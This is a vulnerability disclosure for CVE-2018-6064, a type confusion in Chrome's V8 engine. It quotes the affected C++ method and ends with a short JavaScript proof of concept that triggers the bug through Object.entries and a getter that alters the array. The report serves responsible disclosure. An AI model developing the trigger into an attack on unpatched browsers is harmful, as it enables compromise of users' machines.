Chrome: V8: Type confusion in ElementsAccessorBase::CollectValuesOrEntriesImpl CVE-2018-6064 Here's a snippet of the method. https://cs.chromium.org/chromium/src/v8/src/elements.cc?rcl=3cbf26e8a21aa76703d2c3c51adb9c96119500da&l=1051 static Maybe CollectValuesOrEntriesImpl( Isolate* isolate, Handle object, Handle values_or_entries, bool get_entries, int* nof_items, PropertyFilter filter) { ... for (int i = 0; i < keys->length(); ++i) { Handle key(keys->get(i), isolate); Handle value; uint32_t index; if (!key->ToUint32(&index)) continue; uint32_t entry = Subclass::GetEntryForIndexImpl( isolate, *object, object->elements(), index, filter); if (entry == kMaxUInt32) continue; PropertyDetails details = Subclass::GetDetailsImpl(*object, entry); if (details.kind() == kData) { value = Subclass::GetImpl(isolate, object->elements(), entry); } else { LookupIterator it(isolate, object, index, LookupIterator::OWN); ASSIGN_RETURN_ON_EXCEPTION_VALUE( isolate, value, Object::GetProperty(&it), Nothing()); <<------- (a) } if (get_entries) { value = MakeEntryPair(isolate, index, value); } values_or_entries->set(count++, *value); } *nof_items = count; return Just(true); } At (a), the elements kind can be changed by getters. This will lead to type confusion in GetEntryForIndexImpl. PoC: let arr = []; arr[1000] = 0x1234; arr.__defineGetter__(256, function () { delete arr[256]; arr.unshift(1.1); arr.length = 0; }); Object.entries(arr).toString(); This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public. Found by: lokihardt